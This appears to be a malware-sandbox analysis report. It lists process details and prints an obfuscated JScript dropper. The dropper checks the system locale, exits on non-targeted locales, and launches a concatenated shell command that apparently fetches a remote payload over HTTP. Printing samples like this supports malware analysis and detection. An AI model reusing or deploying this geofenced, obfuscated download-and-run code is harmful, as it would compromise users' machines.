Imagebase: | 0x7ff6c3ff0000 |
File size: | 3'581'912 bytes |
MD5 hash: | 9B38E8E8B6DD9622D24B53E095C5D9BE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 11 |
Start time: | 11:57:51 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\svchost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7b4ee0000 |
File size: | 55'320 bytes |
MD5 hash: | B7F884C1B74A263F746EE12A5F7C9F6A |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 12 |
Start time: | 11:57:51 |
Start date: | 10/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6c3ff0000 |
File size: | 3'581'912 bytes |
MD5 hash: | 9B38E8E8B6DD9622D24B53E095C5D9BE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Call Graph
Graph
- Executed
- Not Executed
Script: |
---|
Code | ||
---|---|---|
0 | function knkecsl() { |
|
1 | mykya = [ 1031, 3079, 5127, 4103, 2055, 3072 ]; | |
2 | var bffyvqj = this[ybcgjmkzg + fegpk + nnnwpvtmn + zqiwd + fevpv + estxq + ptvohnpnk + wwpjdnm] ( this[jyugwkb + qanvax + tfkloc + nnnwpvtmn + endrglbbf + ybcgjmkzg + wwpjdnm][emjsi + nnnwpvtmn + fevpv + fegpk + wwpjdnm + fevpv + whbrb + yrlplvx + ssatst + fevpv + tfkloc + wwpjdnm] ( jyugwkb + qanvax + tfkloc + nnnwpvtmn + endrglbbf + ybcgjmkzg + wwpjdnm + vpvlt + qanvax + edfuxr + fevpv + ctwykybuy + ctwykybuy ) [mlqkjh + fevpv + yknieenl + mlqkjh + fevpv + fegpk + dozeedrw] ( bkhue + etaofp + gfutlap + rtgfizhl + eciyqnmvj + emjsi + kbyemtizo + mlqkjh + mlqkjh + gfutlap + umffw + mmnmmnyla + eciyqnmvj + kbyemtizo + qanvax + gfutlap + mlqkjh + zjayjw + emjsi + mtpgdahzz + ptvohnpnk + wwpjdnm + nnnwpvtmn + mtpgdahzz + ctwykybuy + qoegnlurb + gcvsdrw + fegpk + ptvohnpnk + fevpv + ctwykybuy + zjayjw + estxq + ptvohnpnk + wwpjdnm + fevpv + nnnwpvtmn + ptvohnpnk + fegpk + wwpjdnm + endrglbbf + mtpgdahzz + ptvohnpnk + fegpk + ctwykybuy + zjayjw + vazzscr + mtpgdahzz + tfkloc + fegpk + ctwykybuy + fevpv ), 16 ); |
|
3 | for ( gcxzro = 0 ; gcxzro < mykya[ctwykybuy + fevpv + ptvohnpnk + yknieenl + wwpjdnm + edfuxr] ; ++ gcxzro ) | |
4 | { | |
5 | if ( bffyvqj == mykya[gcxzro] ) | |
6 | { | |
7 | bffyvqj = true; | |
8 | break ; | |
9 | } | |
10 | } | |
11 | if ( bffyvqj !== true ) | |
12 | this[jyugwkb + qanvax + tfkloc + nnnwpvtmn + endrglbbf + ybcgjmkzg + wwpjdnm][afmngkg + qkirrbo + endrglbbf + wwpjdnm] ( ); | |
13 | this[jyugwkb + qanvax + tfkloc + nnnwpvtmn + endrglbbf + ybcgjmkzg + wwpjdnm][emjsi + nnnwpvtmn + fevpv + fegpk + wwpjdnm + fevpv + whbrb + yrlplvx + ssatst + fevpv + tfkloc + wwpjdnm] ( jyugwkb + qanvax + tfkloc + nnnwpvtmn + endrglbbf + ybcgjmkzg + wwpjdnm + vpvlt + qanvax + edfuxr + fevpv + ctwykybuy + ctwykybuy ) [nnnwpvtmn + qkirrbo + ptvohnpnk] ( tfkloc + uctkjkgg + dozeedrw + qoegnlurb + tfanfa + tfkloc + qoegnlurb + ybcgjmkzg + mtpgdahzz + qhuxohbd + fevpv + nnnwpvtmn + zqiwd + edfuxr + fevpv + ctwykybuy + ctwykybuy + vpvlt + fevpv + yovrvrxi + fevpv + qoegnlurb + ktzvpwa + emjsi + mtpgdahzz + uctkjkgg + uctkjkgg + fegpk + ptvohnpnk + dozeedrw + qoegnlurb + nxdgonoot + estxq + ptvohnpnk + zanycbb + mtpgdahzz + qrsifokce + fevpv + ktzvpwa + jyugwkb + fevpv + yrlplvx + mlqkjh + fevpv + qmnvsef + qkirrbo + fevpv + zqiwd + wwpjdnm + qoegnlurb + ktzvpwa + whbrb + qkirrbo + wwpjdnm + svkvwnemu + endrglbbf + ctwykybuy + fevpv + qoegnlurb + oyjxrynxn + wwpjdnm + fevpv + uctkjkgg + ybcgjmkzg + oyjxrynxn + zjayjw + endrglbbf + ptvohnpnk + zanycbb + mtpgdahzz + endrglbbf + tfkloc + fevpv + vpvlt + ybcgjmkzg + dozeedrw + fgtvyq + qoegnlurb + edfuxr + wwpjdnm + wwpjdnm + ybcgjmkzg + rawvak + tfanfa + tfanfa + sorwmzxkr + wqhuctpti + ticey + vpvlt + sorwmzxkr + bynshf + ticey + vpvlt + sorwmzxkr + vpvlt + izujt + novlq + vnboflw + tfanfa + endrglbbf + ptvohnpnk + zanycbb + mtpgdahzz + endrglbbf + tfkloc + fevpv + vpvlt + ybcgjmkzg + edfuxr + ybcgjmkzg + nxdgonoot + hjgzo + hjgzo + zqiwd + wwpjdnm + fegpk + nnnwpvtmn + wwpjdnm + qoegnlurb + oyjxrynxn + wwpjdnm + fevpv + uctkjkgg + ybcgjmkzg + oyjxrynxn + zjayjw + endrglbbf + ptvohnpnk + zanycbb + mtpgdahzz + endrglbbf + tfkloc + fevpv + vpvlt + ybcgjmkzg + dozeedrw + fgtvyq + hjgzo + hjgzo + tfkloc + uctkjkgg + dozeedrw + qoegnlurb + tfanfa + tfkloc + qoegnlurb + ptvohnpnk + fevpv + wwpjdnm + qoegnlurb + qkirrbo + zqiwd + fevpv + qoegnlurb + zjayjw + zjayjw + sorwmzxkr + wqhuctpti + ticey + vpvlt + sorwmzxkr + bynshf + ticey + vpvlt + sorwmzxkr + vpvlt + izujt + novlq + vnboflw + czodbvlv + qatehm + qatehm + qatehm + qatehm + zjayjw + dozeedrw + fegpk + zanycbb + qhuxohbd + qhuxohbd + qhuxohbd + nnnwpvtmn + mtpgdahzz + mtpgdahzz + wwpjdnm + zjayjw + hjgzo + hjgzo + tfkloc + uctkjkgg + dozeedrw + qoegnlurb + tfanfa + tfkloc + qoegnlurb + nnnwpvtmn + fevpv + yknieenl + zqiwd + zanycbb + nnnwpvtmn + ticey + izujt + qoegnlurb + tfanfa + zqiwd + qoegnlurb + zjayjw + zjayjw + sorwmzxkr + wqhuctpti + ticey + vpvlt + sorwmzxkr + bynshf + ticey + vpvlt + sorwmzxkr + vpvlt + izujt + novlq + vnboflw + czodbvlv + qatehm + qatehm + qatehm + qatehm + zjayjw + dozeedrw + fegpk + zanycbb + qhuxohbd + qhuxohbd + qhuxohbd + nnnwpvtmn + mtpgdahzz + mtpgdahzz + wwpjdnm + zjayjw + ticey + dizpgh + dizpgh + dizpgh + yenwlzaf + sorwmzxkr + yenwlzaf + izujt + yenwlzaf + izujt + bynshf + vpvlt + dozeedrw + ctwykybuy + ctwykybuy, 0, false ); |
|
14 | } | |
15 | mlqkjh = "Q"; | |
16 | mlqkjh = "n"; | |
17 | mlqkjh = "D"; | |
18 | mlqkjh = "g"; | |
19 | mlqkjh = "s"; | |
20 | mlqkjh = "r"; | |
21 | mlqkjh = "e"; | |
22 | mlqkjh = "B"; | |
23 | mlqkjh = "R"; | |
24 | eciyqnmvj = "N"; | |
25 | eciyqnmvj = "j"; | |
26 | eciyqnmvj = "B"; | |
27 | eciyqnmvj = "w"; | |
28 | eciyqnmvj = "s"; | |
29 | eciyqnmvj = "v"; | |
30 | eciyqnmvj = "g"; | |
31 | eciyqnmvj = "P"; | |
32 | eciyqnmvj = "b"; | |
33 | eciyqnmvj = "t"; | |
34 | eciyqnmvj = "h"; | |
35 | eciyqnmvj = "p"; | |
36 | eciyqnmvj = "y"; | |
37 | eciyqnmvj = "W"; | |
38 | eciyqnmvj = "a"; | |
39 | eciyqnmvj = "G"; | |
40 | eciyqnmvj = "_"; | |
41 | qatehm = "z"; | |
42 | qatehm = "F"; | |
43 | qatehm = "W"; | |
44 | qatehm = "a"; | |
45 | qatehm = "s"; | |
46 | qatehm = "S"; | |
47 | qatehm = "T"; | |
48 | qatehm = "W"; | |
49 | qatehm = "j"; | |
50 | qatehm = "G"; | |
51 | qatehm = "Z"; | |
52 | qatehm = "b"; | |
53 | qatehm = "j"; | |
54 | qatehm = "o"; | |
55 | qatehm = "I"; | |
56 | qatehm = "H"; | |
57 | qatehm = "N"; | |
58 | qatehm = "E"; | |
59 | qatehm = "b"; | |
60 | qatehm = "b"; | |
61 | qatehm = "g"; | |
62 | qatehm = "m"; | |
63 | qatehm = "n"; | |
64 | qatehm = "g"; | |
65 | qatehm = "b"; | |
66 | qatehm = "n"; | |
67 | qatehm = "E"; | |
68 | qatehm = "v"; | |
69 | qatehm = "Y"; | |
70 | qatehm = "o"; | |
71 | qatehm = "v"; | |
72 | qatehm = "m"; | |
73 | qatehm = "W"; | |
74 | qatehm = "i"; | |
75 | qatehm = "X"; | |
76 | qatehm = "p"; | |
77 | qatehm = "8"; | |
78 | vpvlt = "X"; | |
79 | vpvlt = "j"; | |
80 | vpvlt = "A"; | |
81 | vpvlt = "g"; | |
82 | vpvlt = "T"; | |
83 | vpvlt = "E"; | |
84 | vpvlt = "O"; | |
85 | vpvlt = "X"; | |
86 | vpvlt = "z"; | |
87 | vpvlt = "Y"; | |
88 | vpvlt = "Q"; | |
89 | vpvlt = "A"; | |
90 | vpvlt = "E"; | |
91 | vpvlt = "S"; | |
92 | vpvlt = "G"; | |
93 | vpvlt = "e"; | |
94 | vpvlt = "v"; | |
95 | vpvlt = "i"; | |
96 | vpvlt = "."; | |
97 | qanvax = "J"; | |
98 | qanvax = "o"; | |
99 | qanvax = "W"; | |
100 | qanvax = "y"; | |
101 | qanvax = "j"; | |
102 | qanvax = "g"; | |
103 | qanvax = "u"; | |
104 | qanvax = "w"; | |
105 | qanvax = "u"; | |
106 | qanvax = "V"; | |
107 | qanvax = "n"; | |
108 | qanvax = "d"; | |
109 | qanvax = "Q"; | |
110 | qanvax = "W"; | |
111 | qanvax = "i"; | |
112 | qanvax = "W"; | |
113 | qanvax = "B"; | |
114 | qanvax = "R"; | |
115 | qanvax = "m"; | |
116 | qanvax = "y"; | |
117 | qanvax = "h"; | |
118 | qanvax = "L"; | |
119 | qanvax = "F"; | |
120 | qanvax = "D"; | |
121 | qanvax = "V"; | |
122 | qanvax = "v"; | |
123 | qanvax = "T"; | |
124 | qanvax = "b"; | |
125 | qanvax = "c"; | |
126 | qanvax = "S"; | |
127 | zanycbb = "d"; | |
128 | zanycbb = "T"; | |
129 | zanycbb = "W"; | |
130 | zanycbb = "Q"; | |
131 | zanycbb = "e"; | |
132 | zanycbb = "y"; | |
133 | zanycbb = "R"; | |
134 | zanycbb = "o"; | |
135 | zanycbb = "W"; | |
136 | zanycbb = "d"; | |
137 | zanycbb = "w"; | |
138 | zanycbb = "W"; | |
139 | zanycbb = "h"; | |
140 | zanycbb = "l"; | |
141 | zanycbb = "w"; | |
142 | zanycbb = "R"; | |
143 | zanycbb = "K"; | |
144 | zanycbb = "k"; | |
145 | zanycbb = "z"; | |
146 | zanycbb = "c"; | |
147 | zanycbb = "J"; | |
148 | zanycbb = "b"; | |
149 | zanycbb = "T"; | |
150 | zanycbb = "v"; | |
151 | zanycbb = "w"; | |
152 | zanycbb = "w"; | |
153 | zanycbb = "E"; | |
154 | zanycbb = "u"; | |
155 | zanycbb = "P"; | |
156 | zanycbb = "x"; | |
157 | zanycbb = "f"; | |
158 | zanycbb = "g"; | |
159 | zanycbb = "v"; | |
160 | gfutlap = "D"; | |
161 | gfutlap = "g"; | |
162 | gfutlap = "P"; | |
163 | gfutlap = "S"; | |
164 | gfutlap = "O"; | |
165 | gfutlap = "f"; | |
166 | gfutlap = "y"; | |
167 | gfutlap = "K"; | |
168 | gfutlap = "m"; | |
169 | gfutlap = "w"; | |
170 | gfutlap = "J"; | |
171 | gfutlap = "Z"; | |
172 | gfutlap = "d"; | |
173 | gfutlap = "k"; | |
174 | gfutlap = "C"; | |
175 | gfutlap = "R"; | |
176 | gfutlap = "T"; | |
177 | gfutlap = "F"; | |
178 | gfutlap = "v"; | |
179 | gfutlap = "d"; | |
180 | gfutlap = "L"; | |
181 | gfutlap = "f"; | |
182 | gfutlap = "f"; | |
183 | gfutlap = "l"; | |
184 | gfutlap = "c"; | |
185 | gfutlap = "j"; | |
186 | gfutlap = "k"; | |
187 | gfutlap = "B"; | |
188 | gfutlap = "w"; | |
189 | gfutlap = "o"; | |
190 | gfutlap = "E"; | |
191 | endrglbbf = "d"; | |
192 | endrglbbf = "v"; | |
193 | endrglbbf = "R"; | |
194 | endrglbbf = "M"; | |
195 | endrglbbf = "B"; | |
196 | endrglbbf = "Q"; | |
197 | endrglbbf = "n"; | |
198 | endrglbbf = "X"; | |
199 | endrglbbf = "X"; | |
200 | endrglbbf = "A"; | |
201 | endrglbbf = "A"; | |
202 | endrglbbf = "f"; | |
203 | endrglbbf = "V"; | |
204 | endrglbbf = "R"; | |
205 | endrglbbf = "b"; | |
206 | endrglbbf = "s"; | |
207 | endrglbbf = "s"; | |
208 | endrglbbf = "F"; | |
209 | endrglbbf = "C"; | |
210 | endrglbbf = "N"; | |
211 | endrglbbf = "w"; | |
212 | endrglbbf = "D"; | |
213 | endrglbbf = "p"; | |
214 | endrglbbf = "G"; | |
215 | endrglbbf = "k"; | |
216 | endrglbbf = "T"; | |
217 | endrglbbf = "m"; | |
218 | endrglbbf = "V"; | |
219 | endrglbbf = "F"; | |
220 | endrglbbf = "f"; | |
221 | endrglbbf = "C"; | |
222 | endrglbbf = "W"; | |
223 | endrglbbf = "h"; | |
224 | endrglbbf = "i"; | |
225 | rtgfizhl = "q"; | |
226 | rtgfizhl = "o"; | |
227 | rtgfizhl = "G"; | |
228 | rtgfizhl = "K"; | |
229 | rtgfizhl = "t"; | |
230 | rtgfizhl = "u"; | |
231 | rtgfizhl = "g"; | |
232 | rtgfizhl = "v"; | |
233 | rtgfizhl = "f"; | |
234 | rtgfizhl = "W"; | |
235 | rtgfizhl = "W"; | |
236 | rtgfizhl = "D"; | |
237 | rtgfizhl = "F"; | |
238 | rtgfizhl = "m"; | |
239 | rtgfizhl = "f"; | |
240 | rtgfizhl = "M"; | |
241 | rtgfizhl = "X"; | |
242 | rtgfizhl = "O"; | |
243 | rtgfizhl = "Y"; | |
244 | gcvsdrw = "X"; | |
245 | gcvsdrw = "v"; | |
246 | gcvsdrw = "I"; | |
247 | gcvsdrw = "U"; | |
248 | gcvsdrw = "x"; | |
249 | gcvsdrw = "h"; | |
250 | gcvsdrw = "O"; | |
251 | gcvsdrw = "e"; | |
252 | gcvsdrw = "b"; | |
253 | gcvsdrw = "k"; | |
254 | gcvsdrw = "N"; | |
255 | gcvsdrw = "d"; | |
256 | gcvsdrw = "J"; | |
257 | gcvsdrw = "y"; | |
258 | gcvsdrw = "N"; | |
259 | gcvsdrw = "Z"; | |
260 | gcvsdrw = "j"; | |
261 | gcvsdrw = "K"; | |
262 | gcvsdrw = "h"; | |
263 | gcvsdrw = "p"; | |
264 | gcvsdrw = "F"; | |
265 | gcvsdrw = "E"; | |
266 | gcvsdrw = "i"; | |
267 | gcvsdrw = "b"; | |
268 | gcvsdrw = "k"; | |
269 | gcvsdrw = "v"; | |
270 | gcvsdrw = "M"; | |
271 | gcvsdrw = "H"; | |
272 | gcvsdrw = "P"; | |
273 | kbyemtizo = "w"; | |
274 | kbyemtizo = "y"; | |
275 | kbyemtizo = "g"; | |
276 | kbyemtizo = "a"; | |
277 | kbyemtizo = "Q"; | |
278 | kbyemtizo = "b"; | |
279 | kbyemtizo = "P"; | |
280 | kbyemtizo = "U"; | |
281 | yovrvrxi = "K"; | |
282 | yovrvrxi = "Q"; | |
283 | yovrvrxi = "s"; | |
284 | yovrvrxi = "I"; | |
285 | yovrvrxi = "g"; | |
286 | yovrvrxi = "k"; | |
287 | yovrvrxi = "y"; | |
288 | yovrvrxi = "n"; | |
289 | yovrvrxi = "o"; | |
290 | yovrvrxi = "N"; | |
291 | yovrvrxi = "Q"; | |
292 | yovrvrxi = "G"; | |
293 | yovrvrxi = "p"; | |
294 | yovrvrxi = "H"; | |
295 | yovrvrxi = "q"; | |
296 | yovrvrxi = "k"; | |
297 | yovrvrxi = "n"; | |
298 | yovrvrxi = "W"; | |
299 | yovrvrxi = "P"; | |
300 | yovrvrxi = "t"; | |
301 | yovrvrxi = "H"; | |
302 | yovrvrxi = "G"; | |
303 | yovrvrxi = "C"; | |
304 | yovrvrxi = "Y"; | |
305 | yovrvrxi = "X"; | |
306 | yovrvrxi = "S"; | |
307 | yovrvrxi = "k"; | |
308 | yovrvrxi = "l"; | |
309 | yovrvrxi = "Z"; | |
310 | yovrvrxi = "I"; | |
311 | yovrvrxi = "i"; | |
312 | yovrvrxi = "x"; | |
313 | yovrvrxi = "x"; | |
314 | tfkloc = "M"; | |
315 | tfkloc = "x"; | |
316 | tfkloc = "B"; | |
317 | tfkloc = "j"; | |
318 | tfkloc = "Y"; | |
319 | tfkloc = "q"; | |
320 | tfkloc = "D"; | |
321 | tfkloc = "x"; | |
322 | tfkloc = "M"; | |
323 | tfkloc = "z"; | |
324 | tfkloc = "s"; | |
325 | tfkloc = "M"; | |
326 | tfkloc = "O"; | |
327 | tfkloc = "A"; | |
328 | tfkloc = "Q"; | |
329 | tfkloc = "f"; | |
330 | tfkloc = "B"; | |
331 | tfkloc = "G"; | |
332 | tfkloc = "o"; | |
333 | tfkloc = "S"; | |
334 | tfkloc = "L"; | |
335 | tfkloc = "x"; | |
336 | tfkloc = "F"; | |
337 | tfkloc = "F"; | |
338 | tfkloc = "S"; | |
339 | tfkloc = "A"; | |
340 | tfkloc = "o"; | |
341 | tfkloc = "a"; | |
342 | tfkloc = "c"; | |
343 | fevpv = "V"; | |
344 | fevpv = "p"; | |
345 | fevpv = "j"; | |
346 | fevpv = "j"; | |
347 | fevpv = "G"; | |
348 | fevpv = "H"; | |
349 | fevpv = "j"; | |
350 | fevpv = "V"; | |
351 | fevpv = "y"; | |
352 | fevpv = "m"; | |
353 | fevpv = "G"; | |
354 | fevpv = "G"; | |
355 | fevpv = "r"; | |
356 | fevpv = "q"; | |
357 | fevpv = "z"; | |
358 | fevpv = "p"; | |
359 | fevpv = "Q"; | |
360 | fevpv = "V"; | |
361 | fevpv = "q"; | |
362 | fevpv = "N"; | |
363 | fevpv = "K"; | |
364 | fevpv = "j"; | |
365 | fevpv = "k"; | |
366 | fevpv = "Z"; | |
367 | fevpv = "A"; | |
368 | fevpv = "p"; | |
369 | fevpv = "v"; | |
370 | fevpv = "x"; | |
371 | fevpv = "M"; | |
372 | fevpv = "c"; | |
373 | fevpv = "T"; | |
374 | fevpv = "S"; | |
375 | fevpv = "O"; | |
376 | fevpv = "x"; | |
377 | fevpv = "S"; | |
378 | fevpv = "a"; | |
379 | fevpv = "p"; | |
380 | fevpv = "H"; | |
381 | fevpv = "j"; | |
382 | fevpv = "t"; | |
383 | fevpv = "W"; | |
384 | fevpv = "b"; | |
385 | fevpv = "H"; | |
386 | fevpv = "y"; | |
387 | fevpv = "e"; | |
388 | vazzscr = "Y"; | |
389 | vazzscr = "l"; | |
390 | vazzscr = "L"; | |
391 | yknieenl = "r"; | |
392 | yknieenl = "T"; | |
393 | yknieenl = "D"; | |
394 | yknieenl = "a"; | |
395 | yknieenl = "i"; | |
396 | yknieenl = "t"; | |
397 | yknieenl = "X"; | |
398 | yknieenl = "e"; | |
399 | yknieenl = "C"; | |
400 | yknieenl = "e"; | |
401 | yknieenl = "c"; | |
402 | yknieenl = "r"; | |
403 | yknieenl = "q"; | |
404 | yknieenl = "V"; | |
405 | yknieenl = "G"; | |
406 | yknieenl = "J"; | |
407 | yknieenl = "i"; | |
408 | yknieenl = "O"; | |
409 | yknieenl = "D"; | |
410 | yknieenl = "e"; | |
411 | yknieenl = "e"; | |
412 | yknieenl = "E"; | |
413 | yknieenl = "v"; | |
414 | yknieenl = "L"; | |
415 | yknieenl = "S"; | |
416 | yknieenl = "q"; | |
417 | yknieenl = "x"; | |
418 | yknieenl = "W"; | |
419 | yknieenl = "g"; | |
420 | zjayjw = "J"; | |
421 | zjayjw = "d"; | |
422 | zjayjw = "m"; | |
423 | zjayjw = "S"; | |
424 | zjayjw = "j"; | |
425 | zjayjw = "p"; | |
426 | zjayjw = "X"; | |
427 | zjayjw = "J"; | |
428 | zjayjw = "q"; | |
429 | zjayjw = "N"; | |
430 | zjayjw = "h"; | |
431 | zjayjw = "h"; | |
432 | zjayjw = "c"; | |
433 | zjayjw = "R"; | |
434 | zjayjw = "m"; | |
435 | zjayjw = "F"; | |
436 | zjayjw = "e"; | |
437 | zjayjw = "p"; | |
438 | zjayjw = "S"; | |
439 | zjayjw = "S"; | |
440 | zjayjw = "J"; | |
441 | zjayjw = "y"; | |
442 | zjayjw = "j"; | |
443 | zjayjw = "w"; | |
444 | zjayjw = "d"; | |
445 | zjayjw = "g"; | |
446 | zjayjw = "M"; | |
447 | zjayjw = "q"; | |
448 | zjayjw = "X"; | |
449 | zjayjw = "B"; | |
450 | zjayjw = "n"; | |
451 | zjayjw = "M"; | |
452 | zjayjw = "l"; | |
453 | zjayjw = "m"; | |
454 | zjayjw = "\\"; | |
455 | qrsifokce = "N"; | |
456 | qrsifokce = "e"; | |
457 | qrsifokce = "t"; | |
458 | qrsifokce = "Q"; | |
459 | qrsifokce = "b"; | |
460 | qrsifokce = "G"; | |
461 | qrsifokce = "H"; | |
462 | qrsifokce = "s"; | |
463 | qrsifokce = "y"; | |
464 | qrsifokce = "Y"; | |
465 | qrsifokce = "S"; | |
466 | qrsifokce = "J"; | |
467 | qrsifokce = "s"; | |
468 | qrsifokce = "T"; | |
469 | qrsifokce = "V"; | |
470 | qrsifokce = "R"; | |
471 | qrsifokce = "v"; | |
472 | qrsifokce = "L"; | |
473 | qrsifokce = "f"; | |
474 | qrsifokce = "l"; | |
475 | qrsifokce = "o"; | |
476 | qrsifokce = "L"; | |
477 | qrsifokce = "E"; | |
478 | qrsifokce = "A"; | |
479 | qrsifokce = "G"; | |
480 | qrsifokce = "B"; | |
481 | qrsifokce = "q"; | |
482 | qrsifokce = "i"; | |
483 | qrsifokce = "u"; | |
484 | qrsifokce = "h"; | |
485 | qrsifokce = "B"; | |
486 | qrsifokce = "k"; | |
487 | ssatst = "o"; | |
488 | ssatst = "t"; | |
489 | ssatst = "D"; | |
490 | ssatst = "j"; | |
491 | umffw = "c"; | |
492 | umffw = "V"; | |
493 | umffw = "H"; | |
494 | umffw = "y"; | |
495 | umffw = "r"; | |
496 | umffw = "E"; | |
497 | umffw = "e"; | |
498 | umffw = "A"; | |
499 | umffw = "s"; | |
500 | umffw = "d"; | |
501 | umffw = "e"; | |
502 | umffw = "I"; | |
503 | umffw = "q"; | |
504 | umffw = "Y"; | |
505 | umffw = "Q"; | |
506 | umffw = "D"; | |
507 | umffw = "n"; | |
508 | umffw = "i"; | |
509 | umffw = "e"; | |
510 | umffw = "C"; | |
511 | umffw = "h"; | |
512 | umffw = "j"; | |
513 | umffw = "J"; | |
514 | umffw = "u"; | |
515 | umffw = "R"; | |
516 | umffw = "N"; | |
517 | edfuxr = "h"; | |
518 | edfuxr = "W"; | |
519 | edfuxr = "S"; | |
520 | edfuxr = "u"; | |
521 | edfuxr = "M"; | |
522 | edfuxr = "n"; | |
523 | edfuxr = "a"; | |
524 | edfuxr = "w"; | |
525 | edfuxr = "E"; | |
526 | edfuxr = "A"; | |
527 | edfuxr = "Q"; | |
528 | edfuxr = "p"; | |
529 | edfuxr = "z"; | |
530 | edfuxr = "z"; | |
531 | edfuxr = "s"; | |
532 | edfuxr = "v"; | |
533 | edfuxr = "E"; | |
534 | edfuxr = "q"; | |
535 | edfuxr = "c"; | |
536 | edfuxr = "E"; | |
537 | edfuxr = "I"; | |
538 | edfuxr = "A"; | |
539 | edfuxr = "h"; | |
540 | svkvwnemu = "W"; | |
541 | svkvwnemu = "Q"; | |
542 | svkvwnemu = "J"; | |
543 | svkvwnemu = "j"; | |
544 | svkvwnemu = "e"; | |
545 | svkvwnemu = "j"; | |
546 | svkvwnemu = "V"; | |
547 | svkvwnemu = "H"; | |
548 | svkvwnemu = "P"; | |
549 | svkvwnemu = "C"; | |
550 | svkvwnemu = "o"; | |
551 | svkvwnemu = "U"; | |
552 | svkvwnemu = "g"; | |
553 | svkvwnemu = "K"; | |
554 | svkvwnemu = "Q"; | |
555 | svkvwnemu = "o"; | |
556 | svkvwnemu = "y"; | |
557 | svkvwnemu = "l"; | |
558 | svkvwnemu = "l"; | |
559 | svkvwnemu = "f"; | |
560 | svkvwnemu = "A"; | |
561 | svkvwnemu = "M"; | |
562 | svkvwnemu = "W"; | |
563 | svkvwnemu = "D"; | |
564 | svkvwnemu = "k"; | |
565 | svkvwnemu = "h"; | |
566 | svkvwnemu = "M"; | |
567 | svkvwnemu = "Y"; | |
568 | svkvwnemu = "P"; | |
569 | svkvwnemu = "L"; | |
570 | svkvwnemu = "l"; | |
571 | svkvwnemu = "q"; | |
572 | svkvwnemu = "K"; | |
573 | svkvwnemu = "J"; | |
574 | svkvwnemu = "q"; | |
575 | svkvwnemu = "Z"; | |
576 | svkvwnemu = "h"; | |
577 | svkvwnemu = "G"; | |
578 | svkvwnemu = "d"; | |
579 | svkvwnemu = "D"; | |
580 | svkvwnemu = "T"; | |
581 | svkvwnemu = "F"; | |
582 | izujt = "n"; | |
583 | izujt = "K"; | |
584 | izujt = "b"; | |
585 | izujt = "u"; | |
586 | izujt = "p"; | |
587 | izujt = "o"; | |
588 | izujt = "i"; | |
589 | izujt = "d"; | |
590 | izujt = "E"; | |
591 | izujt = "o"; | |
592 | izujt = "R"; | |
593 | izujt = "Y"; | |
594 | izujt = "C"; | |
595 | izujt = "R"; | |
596 | izujt = "w"; | |
597 | izujt = "b"; | |
598 | izujt = "t"; | |
599 | izujt = "r"; | |
600 | izujt = "E"; | |
601 | izujt = "e"; | |
602 | izujt = "g"; | |
603 | izujt = "2"; | |
604 | ktzvpwa = "b"; | |
605 | ktzvpwa = "U"; | |
606 | ktzvpwa = "i"; | |
607 | ktzvpwa = "q"; | |
608 | ktzvpwa = "p"; | |
609 | ktzvpwa = "h"; | |
610 | ktzvpwa = "M"; | |
611 | ktzvpwa = "m"; | |
612 | ktzvpwa = "V"; | |
613 | ktzvpwa = "v"; | |
614 | ktzvpwa = "c"; | |
615 | ktzvpwa = "-"; | |
616 | tfanfa = "M"; | |
617 | tfanfa = "U"; | |
618 | tfanfa = "o"; | |
619 | tfanfa = "F"; | |
620 | tfanfa = "I"; | |
621 | tfanfa = "A"; | |
622 | tfanfa = "/"; | |
623 | ybcgjmkzg = "t"; | |
624 | ybcgjmkzg = "B"; | |
625 | ybcgjmkzg = "t"; | |
626 | ybcgjmkzg = "l"; | |
627 | ybcgjmkzg = "P"; | |
628 | ybcgjmkzg = "r"; | |
629 | ybcgjmkzg = "g"; | |
630 | ybcgjmkzg = "p"; | |
631 | wqhuctpti = "b"; | |
632 | wqhuctpti = "P"; | |
633 | wqhuctpti = "d"; | |
634 | wqhuctpti = "O"; | |
635 | wqhuctpti = "Y"; | |
636 | wqhuctpti = "c"; | |
637 | wqhuctpti = "R"; | |
638 | wqhuctpti = "E"; | |
639 | wqhuctpti = "Z"; | |
640 | wqhuctpti = "h"; | |
641 | wqhuctpti = "L"; | |
642 | wqhuctpti = "x"; | |
643 | wqhuctpti = "g"; | |
644 | wqhuctpti = "h"; | |
645 | wqhuctpti = "Q"; | |
646 | wqhuctpti = "I"; | |
647 | wqhuctpti = "9"; | |
648 | emjsi = "S"; | |
649 | emjsi = "V"; | |
650 | emjsi = "Z"; | |
651 | emjsi = "l"; | |
652 | emjsi = "f"; | |
653 | emjsi = "A"; | |
654 | emjsi = "q"; | |
655 | emjsi = "j"; | |
656 | emjsi = "Z"; | |
657 | emjsi = "B"; | |
658 | emjsi = "j"; | |
659 | emjsi = "W"; | |
660 | emjsi = "h"; | |
661 | emjsi = "e"; | |
662 | emjsi = "v"; | |
663 | emjsi = "p"; | |
664 | emjsi = "W"; | |
665 | emjsi = "d"; | |
666 | emjsi = "h"; | |
667 | emjsi = "f"; | |
668 | emjsi = "O"; | |
669 | emjsi = "M"; | |
670 | emjsi = "A"; | |
671 | emjsi = "t"; | |
672 | emjsi = "J"; | |
673 | emjsi = "o"; | |
674 | emjsi = "g"; | |
675 | emjsi = "M"; | |
676 | emjsi = "z"; | |
677 | emjsi = "C"; | |
678 | emjsi = "u"; | |
679 | emjsi = "w"; | |
680 | emjsi = "M"; | |
681 | emjsi = "G"; | |
682 | emjsi = "S"; | |
683 | emjsi = "C"; | |
684 | novlq = "V"; | |
685 | novlq = "U"; | |
686 | novlq = "F"; | |
687 | novlq = "L"; | |
688 | novlq = "B"; | |
689 | novlq = "d"; | |
690 | novlq = "R"; | |
691 | novlq = "n"; | |
692 | novlq = "X"; | |
693 | novlq = "N"; | |
694 | novlq = "l"; | |
695 | novlq = "O"; | |
696 | novlq = "e"; | |
697 | novlq = "X"; | |
698 | novlq = "a"; | |
699 | novlq = "i"; | |
700 | novlq = "X"; | |
701 | novlq = "R"; | |
702 | novlq = "u"; | |
703 | novlq = "q"; | |
704 | novlq = "T"; | |
705 | novlq = "L"; | |
